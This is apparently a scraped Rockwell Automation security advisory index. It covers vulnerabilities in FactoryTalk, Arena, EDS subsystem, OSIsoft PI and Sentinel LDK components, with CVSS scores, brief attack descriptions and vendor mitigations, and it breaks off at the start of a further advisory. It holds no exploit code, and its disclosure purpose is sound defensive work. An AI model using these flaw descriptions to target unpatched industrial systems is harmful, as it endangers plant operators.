Customers using affected products are encouraged to evaluate their own systems and apply the appropriate risk mitigations from those listed below. Additional details relating to the discovered vulnerabilities and recommended countermeasures, are provided herein.

Affected Products

FactoryTalk Services Platform - All versions

Vulnerability Details

CVE-2020-12033: Arbitrary COM object instantiation due to lack of data validation

FactoryTalk Services Platform redundancy host service (RdcyHost.exe) does not validate supplied identifiers, which could allow an unauthenticated, adjacent attacker to execute remote COM objects with elevated privileges.

CVSS v3.1 Base Score: 7.5/HIGH
CVSS Vector: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
ZDI Tracking: ZDI-CAN-10299

Risk Mitigation & User Action

Customers are encouraged to use Rockwell Automation Knowledgebase article QA5266 to determine if FactoryTalk Services Platform is installed. Those using the affected software are directed towards risk mitigation by enabling built-in security features found within FactoryTalk Services platform. They are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense in depth strategy. Please subscribe to updates to this advisory and the Industrial Security Advisory Index technote to stay notified.
Vulnerability Information Recommended User Actions



CVE-2020-12033


This vulnerability is mitigated by implementing a secure communication strategy following the guidance outlined in Rockwell Automation Knowledge article QA46277.

General Security Guidelines

Software/PC-based Mitigation Strategies

  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Ensure that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum amount of rights as needed.

Social Engineering Mitigation Strategies
  • Do not open untrusted filed.
  • Do not click on or open URL links from untrusted sources.
  • Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: PN1354 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).
Please direct all media inquiries to Kolve Byrd(kabyrd@ra.rockwell.com).

ADDITIONAL LINKS

High
PN1084 | PN1084 | Multiple Vulnerabilities in Arena Simulation Software
Published Date:
June 08, 2020
Last Updated:
June 08, 2020
CVE IDs:
CVE-2019-13527, CVE-2019-13510, CVE-2019-13519, CVE-2019-13511, CVE-2019-13521
Products:
Arena
CVSS Scores:
7.8, 8.6, 3.3
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.0
Revision History
Version 1.0 - August, 1 2019. Initial Release
Revision History
Revision Number
1.1
Revision History
Version 1.1 - September 19, 2019. Updated Vulnerability Reports.
Revision History
Revision Number
1.2
Revision History
Version 1.2 - June 8, 2020. Updated Vulnerability Reports.

Executive Summary

The Zero Day Initiative (ZDI), part of the information security company Trend Micro, reported multiple potential vulnerabilities in Arena Simulation software. These vulnerabilities, if successfully exploited, may allow a remote, unauthenticated attacker to cause denial of service conditions or execute arbitrary code on a system after using previously freed memory.

Successful exploitation of these vulnerabilities relies on a social engineering attack.

Special thanks to Kimiya of 9SG Security team working with ZDI to find these vulnerabilities.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their networks. Additional details relating to the discovered vulnerabilities, including affected products and recommended countermeasures, are provided herein.

Affected Products

Arena® Simulation Software for Manufacturing, Cat. 9502-Ax, Versions 16.00.00 and earlier.

Vulnerability Details

CVE-2019-13510: Denial-of-service file parsing use-after-free potential remote code execution vulnerabilities
If a maliciously crafted Arena® file, also known as a .doe file type, is sent to an unsuspecting victim who is tricked, via social-engineering techniques, into opening the file in Arena®, the software application will crash and result in the potential loss of any unsaved data. The victim will need to restart Arena® to continue normal use. A threat actor may additionally design their malicious file to execute their own code when it is opened by the targeted user, which could result in compromise of the victim’s machine depending on the content of the threat actor’s code.

Note: There are also valid reasons why a file may not open in Arena®. To learn more about these circumstances, please see RAid#1073702.

CVSS v3.1 Base Score: 8.6/10[HIGH]
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H.
CVE ID ZDI Report ID
CVE-2019-13510 ZDI-CAN-8012
ZDI-CAN-8013
ZDI-CAN-8015
ZDI-CAN-8016
ZDI-CAN-8017
ZDI-CAN-8060
ZDI-CAN-8062
ZDI-CAN-8096
ZDI-CAN-8174
ZDI-CAN-8600
ZDI-CAN-8623
ZDI-CAN-8624
ZDI-CAN-8683
ZDI-CAN-10129
ZDI-CAN-10186
ZDI-CAN-10373
ZDI-CAN-10374
ZDI-CAN-10470
ZDI-CAN-10554
ZDI-CAN-10555
ZDI-CAN-10556
ZDI-CAN-10557
ZDI-CAN-10559


CVE-2019-13511: Use-after-free Information disclosure vulnerability
If a maliciously crafted  .doe file type, is sent to an unsuspecting victim who is tricked, via social-engineering techniques, into opening the file in Arena®, information from the targeted workstation could be accessed. However, the threat actor cannot target and retrieve data of their choosing.

CVSS v3.1 Base Score: 3.3/10[LOW]
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N.
CVE ID ZDI Report ID
CVE-2019-13511 ZDI-CAN-8014

CVE-2019-13519: Denial-of-service file parsing type confusion vulnerability
If a maliciously crafted  .doe file type, is sent to an unsuspecting victim who is tricked, via social-engineering techniques, into opening the file in Arena®, the software application will crash and result in the potential loss of any unsaved data. The victim will need to restart Arena® to continue normal use. A threat actor may additionally design their malicious file to execute their own code when it is opened by the targeted user, which could result in compromise of the victim’s machine depending on the content of the threat actor’s code.

CVSS v3.1 Base Score: 8.6/10[HIGH]
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
CVE ID ZDI Report ID
CVE-2019-13519 ZDI-CAN-8175

CVE-2019-13521: Denial-of-service file type insufficient UI vulnerability
If a maliciously crafted Arena® file, also known as a .doe file type, is sent to an unsuspecting victim who is tricked, via social-engineering techniques, into opening the file in Arena®, the software application will crash and result in the potential loss of any unsaved data. The victim will need to restart Arena® to continue normal use. A threat actor may additionally design their malicious file to execute their own code when it is opened by the targeted user, which could result in compromise of the victim’s machine depending on the content of the threat actor’s code.

CVSS v3.1 Base Score: 7.8/10[HIGH]
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CVE ID ZDI Report ID
CVE-2019-13521 ZDI-CAN-8134

CVE-2019-13527: Denial-of-service conditions due to uninitialized pointer dereference
If a maliciously crafted Arena® file, also known as a .doe file type, is sent to an unsuspecting victim who is tricked, via social-engineering techniques, into opening the file in Arena®, the software application will crash and result in the potential loss of any unsaved data. The victim will need to restart Arena® to continue normal use. The issue results from the lack of proper initialization of a pointer prior to accessing it. A threat actor may additionally design their malicious file to execute their own code when it is opened by the targeted user, which could result in compromise of the victim’s machine depending on the content of the threat actor’s code.

CVSS v3.1 Base Score: 7.8/10[HIGH]
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CVE ID ZDI Report ID
CVE-2019-13527 ZDI-CAN-8682

Risk Mitigation & User Action

Customers using the affected versions of Arena® are encouraged to install the updated revision of software that addresses the associated risk. Customers who are unable to update are directed to the risk mitigation strategies provided below, and are encouraged, when possible, to combine these with secondary mitigations.

  1. Customers using Arena® v16.00.00 are encouraged to implement patch v16.00.01 to address these vulnerabilities (Download).

  2. Do not open untrusted .doe files with Arena® Simulation Software.
  3. Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  4. Use trusted software, software patches, anti-virus/anti-malware programs and interact only with trusted websites and attachments.
  5. Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.
  6. Refer to 546987 - Rockwell Automation Customer Hardening Guidelines for our latest published guidelines for PC hardening and software security.
  7. Use of Microsoft AppLocker or other similar Whitelisting application can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at https://rockwellautomation.custhelp.com/app/answers/detail/a_id/546989.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: 54102 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com). Please direct all media inquiries to Kolve Byrd (kabyrd@ra.rockwell.com).

ADDITIONAL LINKS

General Security Guidelines

High
PN1503 | PN1503 | EDS Subsystem Affected by Multiple Vulnerabilities
Published Date:
May 19, 2020
Last Updated:
May 19, 2020
CVE IDs:
CVE-2020-12038, CVE-2020-12034
Products:
Software, Logix Designer, RSNetWorx, FactoryTalk Linx Gateway, RSLinx Classic (Single Node, FactoryTalk Linx / RSLinx Enterprise, RSLogix 5000 / Studio 5000 Logix Designer
CVSS Scores:
8.2, 6.7
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.0
Revision History
Version 1.0 - May 19, 2020.  Initial Release.

Executive Summary

Rockwell Automation received a report from Claroty, an industrial security product vendor and research company, regarding multiple vulnerabilities in the parsing and storing of Electronic Datasheet (EDS) files in Rockwell Automation® software products. These vulnerabilities, if successfully exploited, may result in code injection and denial-of-service conditions

EDS files are text files that allow product-specific information to be made available to third-party vendors by Rockwell Automation. These files define a device's configurable parameters and the public interfaces to those parameters for identification and commissioning.

Rockwell Automation has provided software updates containing the remediation to these vulnerabilities. Customers using the affected versions of these products are encouraged to evaluate the mitigations provided below and apply them appropriately.

Affected Products

  • FactoryTalk® Linx software(Previously called RSLinx® Enterprise) versions 6.00, 6.10,and 6.11
  • RSLinx® Classic v4.11.00 and earlier
  • RSNetWorx™ software v28.00.00 and earlier
  • Studio 5000 Logix Designer® software v32 and earlier

Vulnerability Details

CVE-2020-12034: SQL injection due to improper input sanitization
The EDS subsystem does not provide adequate input sanitization, which may allow an attacker to craft specialized EDS files to inject SQL queries and manipulate the database storing the EDS files. This may lead to denial-of-service (DoS) conditions or allow an attacker to manipulate the SQL engine to write or modify files on the system. This affects the EDS subsystem v27 and earlier.

CVSS v3.1 Base Score: 8.2/10[HIGH]
CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:H

CVE-2020-12038: Denial-of-service conditions due to memory corruption in parsing/storage of EDS files
A memory corruption vulnerability exists in the algorithm that matches square brackets in the EDS subsystem. This may allow an attacker to craft specialized EDS files to crash the EDSParser COM object leading to denial-of-service (DoS) conditions. This affects the EDS subsystem v27 and earlier.

CVSS v3.1 Base Score: 6.7/10[MEDIUM]
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:H

Risk Mitigation & User Action

Customers using the affected products are encouraged to update to an available software revision that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.

CVE Products Affected Mitigation
CVE-2020-12034
CVE-2020-12038
  • FactoryTalk® Linx software(Previously called RSLinx® Enterprise) versions 6.00, 6.10,and 6.11
  • RSLinx® Classic v4.11.00 and earlier
  • RSNetWorx™ software v28.00.00 and earlier
  • Studio 5000 Logix Designer® software v32 and earlier
 Apply patch by following the instructions in knowledgebase article RAid 1125928.

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products

  • Block all traffic to EtherNet/IP™ or other CIP™protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP Port#s 2222, 7153 and UDP Port# 44818 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see Knowledgebase Article ID 898270.

General Mitigations

  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: 54102 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).
Please direct all media inquiries to Kolve Byrd (KAByrd@ra.rockwell.com).

Additional Links

High
PN1502 | PN1502 | OSIsoft PI System Vulnerabilities Affect Multiple Rockwell Automation Software Products
Published Date:
May 12, 2020
Last Updated:
May 12, 2020
CVE IDs:
CVE-2020-10608, CVE-2020-10606, CVE-2020-10645, CVE-2020-10600, CVE-2020-10610
Products:
FactoryTalk VantagePoint, FactoryTalk View SE, FactoryTalk Historian SE, PlantPAx, ThingWorx Connection Server
CVSS Scores:
7.8, 8.0, 5.9
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
2.0
Revision History
Version 2.0 - October, 13, 2020. Updated risk mitigations and recommended user actions.
Version 1.0 - May 12, 2020.  Initial Release.

Executive Summary

OSIsoft reported five vulnerabilities in PI System, a real-time data collection and visualization software, to Rockwell Automation. PI System software is used in multiple Rockwell Automation® software products. These vulnerabilities if successfully exploited, may result in privilege escalation, information disclosure or a denial-of-service condition.

Not every PI System vulnerability applies to each impacted product. Please see the table under Affected Products for a full list of the affected Rockwell Automation products and the corresponding PI System vulnerability.

Customers using affected products are encouraged to evaluate their own systems and apply the appropriate risk mitigations from those listed below. Additional details relating to the discovered vulnerabilities and recommended countermeasures, are provided herein.

Affected Products

Product CVE-2020-10610 CVE-2020-10608 CVE-2020-10606 CVE-2020-10600 CVE-2020-10645
FactoryTalk® View SE software version 11.00.00 and earlier X X X
FactoryTalk® VantagePoint® software version 8.10.00 and earlier X X X
FactoryTalk Historian - ThingWorx Connector software version 3.00.00 X X X
FactoryTalk Historian SE software version 6.00.00 and earlier X X X X
PlantPAx® DCS software (including Virtual Templates) version 4.60.00 and earlier X X X
FactoryTalk ProcessBook software version 3.60.00 and earlier X X X X
FactoryTalk Datalink software version 5.30.00 and earlier X X X
FactoryTalk Historian SE to Historian SE (SE2SE) Interface software version 3.08.07 and earlier X X X
FactoryTalk Historian SE Interface for Universal File Loader software version 3.01.02 and earlier X X X
FactoryTalk Historian SE Interface for ODBC (RDBMS) software version 3.20.06 and earlier X X X
FactoryTalk Historian Batch Interface software version 1.00.20 and earlier X X X
FactoryTalk Historian Event Frames Generator (PE EFGen) software version 4.00.25 and earlier X X X
FactoryTalk Historian SE Advance Server software version 6.00.00 and earlier X X X
FactoryTalk Historian SE third-party OLEDB Connectivity software version 4.00.00 and earlier X X X
FactoryTalk Historian SE third-party OPC Connectivity software version 4.00.00 and earlier X X X

Vulnerability Details

OSISoft provided the vulnerability details in their security advisory.

CVE-2020-10610: Local Privilege Escalation via Uncontrolled Search Path Element
A local attacker can modify a search path and plant a binary to exploit the affected PI System software and take control of the local computer at system level privileges, resulting in unauthorized information disclosure, deletion or modification.

CVSS v3 Base Score: 7.8/10 (HIGH)
CVSS Vector String: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H.c

CVE-2020-10608: Local Privilege Escalation via Improper Verification of Cryptographic Signature
A local attacker can plant a binary and bypass a code integrity check for loading PI System libraries. Exploitation can target another local user of the software to escalate privilege, resulting in unauthorized information disclosure, deletion or modification.

CVSS v3 Base Score: 7.8/10 (HIGH)
CVSS Vector String: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H.

CVE-2020-10606: Local Privilege Escalation via Incorrect Default Permissions
A local attacker can exploit incorrect permissions set by affected PI System software. Exploitation can result in unauthorized disclosure, deletion, or modification if the local computer also processes PI System data from other users such as a shared workstation or terminal server deployment.

CVSS v3 Base Score: 7.8/10 (HIGH)
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H.

CVE-2020-10600: Null Pointer Dereference may cause Denial-conditions
A remote, authenticated attacker could crash PI Archive Subsystem when the subsystem is working under memory pressure. This can result in blocking queries to PI Data Archive and may cause denial-of-service conditions.

CVSS v3 Base Score: 5.9/10 (MEDIUM)
CVSS Vector String: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H.

CVE-2020-10645: Use of Out-of-range Pointer Offset may lead to Remote Code Execution
A remote, authenticated attacker could embed malicious content in the display file of the impacted software product. When opened by an affected version, the attacker could read, write and execute code on the computer with the impacted software in the context of the current user.

CVSS v3 Base Score: 8.0/10 (HIGH)*
CVSS Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

* Note: OSIsoft calculated the Temporal CVSS metrics for this vulnerability, which brings the score to a 6.4/10 (MEDIUM)

Risk Mitigation & User Action

Currently, Rockwell Automation is working to address these vulnerabilities and will continue to provide updates and user guidance as these fixes become available. Please subscribe to security updates to this advisory and the Industrial Security Index (Knowledgebase PN1354) to stay notified.

Customers currently using any of the affected software are encouraged to take the following actions:

v2.0 - Update:

Product CVE Identifiers Suggested Action
FactoryTalk® View SE software CVE-2020-10606
CVE-2020-10608
CVE-2020-10610		 Download v12.00.00 or later.
FactoryTalk Historian SE CVE-2020-10600
CVE-2020-10606
CVE-2020-10608
CVE-2020-10610		 Download v7.00.00 or later.
PlantPAx® DCS software (including Virtual Templates) CVE-2020-10606
CVE-2020-10608
CVE-2020-10610		 Download v5.00 or later.
FactoryTalk ProcessBook software CVE-2020-10606
CVE-2020-10608
CVE-2020-10610
CVE-2020-10645		 Download v3.70.01 or later.
FactoryTalk Datalink software CVE-2020-10606
CVE-2020-10608
CVE-2020-10610		 Download v5.50.02 or later.
FactoryTalk Historian SE Interface for Universal File Loader software CVE-2020-10606
CVE-2020-10608
CVE-2020-10610		 Download v3.60.07 or later.
FactoryTalk Historian SE Interface for ODBC (RDBMS) software CVE-2020-10606
CVE-2020-10608
CVE-2020-10610		 Download v3.24.05 or later.
FactoryTalk Historian Event Frames Generator (PE EFGen) software CVE-2020-10606
CVE-2020-10608
CVE-2020-10610		 Download v4.00.40 or later.
FactoryTalk Historian SE Advance Server software CVE-2020-10606
CVE-2020-10608
CVE-2020-10610		 Download v7.00.00 or later.
FactoryTalk Historian SE third-party OLEDB Connectivity software CVE-2020-10606
CVE-2020-10608
CVE-2020-10610		 Download v7.00.00 or later.
FactoryTalk Historian SE third-party OPC Connectivity software CVE-2020-10606
CVE-2020-10608
CVE-2020-10610		 Download v7.00.00 or later.

v1.0 - Initial Release:
Customers currently using any of the affected software that is not listed in the table above are encouraged to take the following actions:

Vulnerability Identifier Suggested Actions
CVE-2020-10610
  • Work with your IT administrator to manage permissions on HKLMSoftwarePISystem and HKLMSoftwareWOW6432NodePISystem registry keys to block a high impact exploit path.
  • Monitor the above keys and the following folder: ProgramDataPISystem for any unauthorized changes
  • See Knowledgebase ID QA59280 for details on setting registry permissions.
  • See Knowledgebase ID QA59281 for details on monitoring the registry.
CVE-2020-10608
  • Restrict network connections from PI client workstations to trusted AF servers (TCP port 5457)
CVE-2020-10606
  • Evaluate and disable unused PI Buffering services from PI client workstations (PI Buffer Subsystem, PI Buffer Server)
  • By default, buffering is not configured. If buffering is configured, the preferred method of authentication is to use Windows Authentication for the connection from the Buffer to the Historian.
  • See Knowledgebase ID QA59282 to check whether PI Buffering is enabled.
CVE-2020-10600
  • Limit console and remote desktop logon access to authorized administrators for normally unattended PI System servers and interface nodes.
CVE-2020-10645
  • Delete lfmngu.dll from %PIHOME%Procbook directory (typically C:Program Files (x86)Rockwell SoftwareFactoryTalk HistorianPIPCProcbook or C:Program Files (x86)PIPCProcbook).
  • The third-party library is not needed for supported PI ProcessBook features.
  • See Knowledgebase Document ID QA56969 for other possible default installation paths.

General Security Guidelines

  • Run all software as user, not as an administrator, to minimize the impact of malicious code on the infected system.
  • (CVE-2020-10610 & CVE-2020-10608) Use of Microsoft® AppLocker or other similar whitelisting application can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article ID 546989.
  • Ensure that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum amount of rights as needed.
  • Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article ID 494865.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

See our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation at 54102 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).
Please direct all media inquiries to Kolve Byrd (kabyrd@ra.rockwell.com).

Additional Links

Critical
PN1500 | PN1500 | FactoryTalk Activation Affected by Sentinel LDK Vulnerabilities
Published Date:
April 23, 2020
Last Updated:
April 23, 2020
CVE IDs:
CVE-2017-12819, CVE-2019-8282, CVE-2017-11497, CVE-2017-11496, CVE-2017-12818, CVE-2017-11498, CVE-2017-12821, CVE-2017-12822, CVE-2019-8283, CVE-2017-12820
Products:
FactoryTalk Activation
CVSS Scores:
7.5, 9.9, 9.8, 5.3
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.0
Revision History
Version 1.0 / April 23, 2020 - Initial Release

Executive Summary

Kaspersky, a cybersecurity company, alerted Rockwell Automation of ten vulnerabilities in the hasplms service that is part of Gemalto’s HASP SRM, Sentinel HASP, and Sentinel LDK products. FactoryTalk® Activation provides the user a way to install the Sentinal LDK Runtime Environment. The Sentinal LDK Runtime Environment allows the installation of the necessary drivers to use Flexera dongles. Customers who are not using Flexera dongles to store activations would not be impacted by these vulnerabilitites.

These vulnerabilities are remotely exploitable and may allow threat actors to cause a denial-of-service (DoS) condition or execute arbitrary code if successfully exploited.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

FactoryTalk Activation Manager v4.03.11 and below
  • Includes Sentinal LDK Runtime Environment v7.50

Vulnerability Details

CVE-2017-12822: Remote Code Execution (RCE) via Admin Interface
A remote, unauthenticated attacker may enable and disable the admin interface in the Sentinel LDK Runtime Environment. Attacker may cause remote code execution.

CVSS v3.0 Base Score: 9.9/CRITICAL
CVSS v3.0 Vector String: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L

CVE-2017-11496: Arbitrary Code Execution via Malformed ASN.1 Streams
A stack buffer overflow in hasplms in Gemalto ACC (Admin Control Center) may allow a remote, unauthenticated attacker to execute arbitrary code via malformed ASN.1 streams in V2C and similar input files.

CVSS v3.0 Base Score: 9.8/CRITICAL
CVSS v3.0 Vector String: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2017-11497: Arbitrary Code Execution via Language Packs with Filenames Longer than 1024 Characters
A stack buffer overflow in hasplms in Gemalto ACC (Admin Control Center) may allow a remote, unauthenticated attacker to execute arbitrary code via language packs containing filenames longer than 1024 characters.

CVSS v3.0 Base Score: 9.8/CRITICAL
CVSS v3.0 Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2017-12819: NTLM-Relay Attack via Remote Manipulations with Language Pack Updater
Manipulations with language pack updater may allow a remote, unauthenticated attacker to perform a NTLM-relay (NT Lan Manager) attack for system users. Successful exploitation of this vulnerability may cause a NTLM-hash capture that could lead to unknown impacts.

CVSS v3.0 Base Score: 9.8/CRITICAL
CVSS v3.0 Vector String: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2017-12821: Remote Code Execution via Memory Corruption
An XML payload with more than the supported number of elements leads to a buffer overflow of a variable in stack. Successful exploitation may allow a remote, unauthenticated attacker to cause denial-of-service (DoS) conditions or remote code execution.

CVSS v3.0 Base Score: 9.8/CRITICAL
CVSS v3.0 Vector String: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2017-11498: Denial of Service (DoS) via Language Pack (ZIP file) with Invalid HTML Files
Language packs (ZIP files) with invalid HTML files lead to null pointer dereferences, which could be exploited by malicious HTML files. Successful exploitation may allow a remote attacker, unauthenticated attacker to cause denial of service (DoS) conditions.

CVSS v3.0 Base Score: 7.5/HIGH
CVSS v3.0 Vector String: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H.

CVE-2017-12818: Denial of Service (DoS) via Stack Overflow in Custom XML-Parser
A stack overflow in custom XML-parser in Sentinel LDK may allow a remote, unauthenticated attacker to cause a denial-of-service (DoS) condition.

CVSS v3.0 Base Score: 7.5/HIGH
CVSS v3.0 Vector String: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2017-12820: Denial of Service (DoS) via Arbitrary Memory Read from Controlled Memory Pointer
An arbitrary memory read from controlled memory pointer in Sentinel LDK may allow a remote, unauthenticated attacker to cause a denial-of-service (DoS) condition.

CVSS v3.0 Base Score: 7.5/HIGH
CVSS v3.0 Vector String: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2019-8282: Man-in-the-Middle (MITM) Attack via Cleartext HTTP Communications
Gemalto ACC (Admin Control Center) uses cleartext HTTP to obtain language packs. A skilled remote attacker may be able to perform a Man-in-the-Middle (MITM) attack and replace the original language pack with a malicious one. User interaction is required in order for attackers to successfully exploit this vulnerability.

CVSS v3.0 Base Score: 5.3/MEDIUM
CVSS v3.0 Vector String: AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N.

CVE-2019-8283: Hasplm cookie does not have a HTTPOnly Attribute
The Hasplm cookie in Gematlo ACC (Admin Control Center) does not have HTTPOnly flag. This may allow a remote attacker to use a malicious javascript to steal the cookie. User interaction is required.

CVSS v3.0 Base Score: 5.3/MEDIUM
CVSS v3.0 Vector String: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N.

Risk Mitigation & User Action

Customers using the affected versions of FactoryTalk Activation are encouraged to update to FactoryTalk Activation version 4.04.00 or greater. This version addresses the associated risk and uses a version of Sentinel LDK Runtime Environment with no known vulnerabilities associated with it at time of publication.

General Security Guidelines

  • Utilize proper network infrastructure controls, such as firewalls, to help ensure that EtherNet/IP™ traffic from unauthorized sources are blocked.
  • Block all traffic to EtherNet/IP or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 2222 and Port# 44818 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation® Products, refer to Knowledgebase Article ID 898270.
  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Use of Microsoft® AppLocker or other similar Whitelisting application can help mitigate risk.  Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article ID 546989.
  • Ensure that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: 54102 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).
Please direct all media inquiries to Kolve Byrd (kabyrd@ra.rockwell.com).

ADDITIONAL LINKS

High
PN1498 | PN1498 | Current Program Updater Vulnerable to Privilege Escalation
Published Date:
April 09, 2020
Last Updated:
April 09, 2020
CVE IDs:
CVE-2017-5176
Products:
Current Program Updater v1.1.0.7
CVSS Scores:
7.0
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.0
Revision History
Version 1.0 - April 09, 2020. Initial Release.

Executive Summary

